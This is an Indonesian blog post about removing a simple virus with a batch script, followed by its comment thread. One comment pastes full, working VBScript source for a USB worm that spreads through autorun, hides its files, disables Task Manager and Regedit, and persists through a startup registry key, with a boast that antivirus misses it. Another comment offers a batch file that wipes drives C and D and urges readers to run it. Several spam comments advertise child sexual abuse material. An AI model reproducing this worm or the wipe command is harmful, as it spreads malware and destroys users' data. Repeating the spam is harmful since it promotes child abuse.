basmi Virus pake notepad
Posted by bams pada Juli 1, 2008
Pernahkah anda merasa diri anda seperti anti virus??? yeah itulah yang pernah gw rasa’in knapa???
bagaimana tidak, entah itu kawan rumah, kampuzzz bahkan kawan nongkrong pun kalo ada permasalahan dengan virus nanya_Nye ke Gw padahal dia tawu dengan pasti kalo OS Win*** gw ga’ pake AntiVirus, spontan gw jawab dengan nada bercanda “Emang_Nye Gw AntiVirus hehe”…
Walaupun begitu gw cukup bangga ama diri gw sendiri hehehehe!!!!
Yang paling parah_Nye lagi, ada yang nekat bawa laptop_Nye keTempat Gw, Sepertinye Dia Yakin kalo gw bisa ngebasmi tuh virus padahal belum tentu(Menyedihkan)…
setelah gw terawang ternyata virus_Nye cuma virus kacangan, sehingga dengan bermodal notepad pun bisa dibersihin ampe tuntas Coz Virus_Nye kaga’ meng Handle CommandPrompt N Task Manager, but jika proses virus_Nye diMatiin lewat Task Manager ga’ bisa, karna ada dua proses yang running, kalo yang atu dimatiin maka yang atu lagi akan memanggil_Nye lagi….
untuk itu gw memanfaatkan notepad N gw tulis
@echo off
echo matiin proses virus_Nye
taskkill /F /IM namavirus1.exe /IM namavirus2.exe
echo apus Semua virus_Nye berdasarkan ukuran
for /R C:\ %%a in (*.exe) do if %%~za equ 157184 del /A: H S R A “%%a”
echo apus virus yang Nyamar
echo untuk drive c N subfolder_Nye
for /R C:\ %%a in (*.doc.exe) do del “%%a”
echo untuk drive d N subfolder_Nye
for /R D:\ %%a in (*.doc.exe) do del “%%a”
echo Ngembaliin Document yang diHidden
cd /d c:\
echo untuk drive C N subfolder_Nye
attrib *.doc -H -S -A /S
cd /d d:\
echo untuk drive D N subfolder_Nye
attrib *.doc -H -S -A /S
exit
gw simpen script tersebut dengan nama 4L13N.bat
Selesai dech tinggal normalin registry_Nye N terakhir gw cuma dapet ucapan thank’s
Firman Sitompul said
ah ini sih tulisannya mengcopy paste dari si pemilik echo,,,hehehe
kacahati said
kalo gak salah di forum virologi.info sering dikupas deh!!!!http://www.kacahati.wordpress.com
Firman Sitompul said
aku malah ada dapat cara bikin virus dari notepad nih
Iseng-iseng mencolok Flash Disc saudara saya tiba-tiba saya nemu sebuah malcode lokal yang dibuat dengan bahasa VBS. Wah, ternyata para virus maker mulai melirik memakai bahasa VBS. Mungkin karena menyangkut HAKI (Hak Atas Kekayaan Intelektual) karena VB6.0 yang banyak beredar adalah bajakan. Jadi ia membuat virus dengan VBS yang bisa dibuat hanya dengan Notepad karena di Windows sudah ada compiler yang terintegrasi dengannya, Windows Based Script Host.
Sesua janji saya, kita akan membuat virus yang sederhana menggunakan Notepad. Virus ini akan membuat dirinya menyebar ke removable disc dengan AutoRun sehingga komputer lain yang tercolok flash disc terinfeksi akan langsung menjadi korban tanpa menungu User menjalankan infector-nya. Virus ini saya beri nama “Kalong.VBS”. Sekarang buka Notepad-nya. Copy kode berikut :
‘//–Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus–//
on error resume next
‘//–Dim kata-kata berikut ini–//
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,kalong,nt,check,sd
‘//–Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information–//
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6.dll.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do
‘//–Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows)
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
tf.attributes = 32
set tf=fs.createtextfile(windowpath & “\batch- k4l0n6.dll.vbs”,2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
tf.attributes = 39
‘//–Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok–//
‘Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket
for each flashdrive in fs.drives
‘//–Cek Drive–//
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path “A:” then
‘//–Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\–//
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\k4l0n6.dll.vbs “,2,true)
tf.write rekursif
tf.close
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
tf.attributes = 39
‘//–Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)–//
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next
‘//–Manipulasi Registry–//
set kalong = createobject(”WScript.Shell”)
‘//–Manip – Ubah Title Internet Explorer menjadi THE KALONG v.s. ZAY–//
kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,” THE KALONG v.s. ZAY “
‘//–Manip – Set agar file hidden tidak ditampilkan di Explorer–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “0″, “REG_DWORD”
‘//–Manip – Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”
‘//–Manip – Disable klik kanan–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”
‘//–Manip – Munculkan Pesan Setiap Windows Startup–//
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Worm Kalong. Variant from Rangga-Zay, don’t panic all data are safe.”
‘//–Manip – Aktif setiap Windows Startup–//
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- k4l0n6.dll.vbs “
‘//–Manip – Ubah RegisteredOwner dan Organization–//
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “The Batrix”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”Kalong”
‘//–Nah kalau kode dibawah ini saya nggak tau, tolong Mas Aat_S untuk menjelaskan–//
if check 1 then
Wscript.sleep 200000
end if
loop while check 1
set sd = createobject(”Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
‘Akhir dari Kode
Save code di Notepad dengan cara FILE > SAVE. Lalu di save as type pilih “All Files (*.*). Simpan dengan nama : k4l0n6.dll.vbs. Sebenarnya gak usah pake *.dll juga gak apa-apa tapi usaha agar tidak mencurigakan aja.
He..he…Virus Worm ini memang bukan murni dari pemikiran saya sendiri karena meniru kode-nya virus Rangga-Zay. Tapi yang ini lebih bagus karena tidak terdeteksi pakai PCMAV RC15, CLAMAV, dan AVAST. Itung-itung ini buat Anda tahu kalau membuat virus/worm tidak perlu membeli software bajakan. Pakai Notepad (dari Windows Original) juga bisa.
sama ini juga copy paste
hehehehe
krans99 said
000}–>Firman
thanks komenya bro
he he he ya nich masih ngopy di keluarga wordpress itung2 biar blognya ga sepi tulisan
Firman Sitompul said
http://uthuram89.wordpress.com
salam kenal ya
tambah di bloggroll kamu yachhh
o iya
kasih tau donk caranya buat maebo tuh???
minta scriptnya donkkk
yudios said
attrib *.doc -H -S -A /S
ini artinya menampilkan semua file yang dihidden ya?.
Saya pernah melacak virus dari registri. hasilnya saya harus instal ulang. Soalnya, biasanya virus mengacak-acak registri juga.
bams said
ya kebanyakan virus2 komputer memang banyak mengacak registri…
jadi harus hati2 sebelum memakai USB/lainya…
sanababit said
SAMPAH SEMUA GUYS KOMENTAR DARI SAUDARA2
asasas said
ga mutu gitu sih isinya….
tapi ga papa…
terus kembangin….
aminulloh said
kalo cuma kopi paste kayaknya gak sulit juga tapi gwa pengen yang hasil pribadi da yang basa bantu gak?
aku sendiri belum paham bahasa pmrograqman
pa lagi ma regedit
bams said
he9
@mas amin & saudara2 semua jika pengen belajar tips trick registry windows ni ada panduanya dowload disini modulnya
Cialis said
cUZMk2 Excellent article, I will take note. Many thanks for the story!
hackschoool said
klik di sini
Cheat Game Bro. . .
bokek said
pc saya kena virus yang semua mail lokalnya tidak bisa di run
seperti microsotf ocloc sudah di instal berkali kali tetap mati help broo
samuel said
RqFC3h http://dy5Ndo9BsL1vpVv5kqsUh.com
Phrrrolg said
good material thanks child porn magazine 68286
Apcgfxaw said
Hello good day ass freaky little 😦
Ijdhqekm said
How would you like the money? nudist underage teen 824
Henrebeh said
Hello good day sunny lolitas
nebz
lexfun said
ini aja cukup..
@echo off
DEL C: -Y
DEL D: -Y
buat hapus semua file di harddisk.. hehee
copas ke notepad, ganti save as type menjadi all file’s.
simpan dengan nama ; virus.bat
coba jalankan !
di tunggu laporan nya,
Hemsvghm said
Did you go to university? http://orysufeaip.de.tl nymphet incest video musta been desperate to suck such a tiny dick. PUSSY IN THE RIGHT CORNER OF THE SCREEN IN THE BEGGINING xD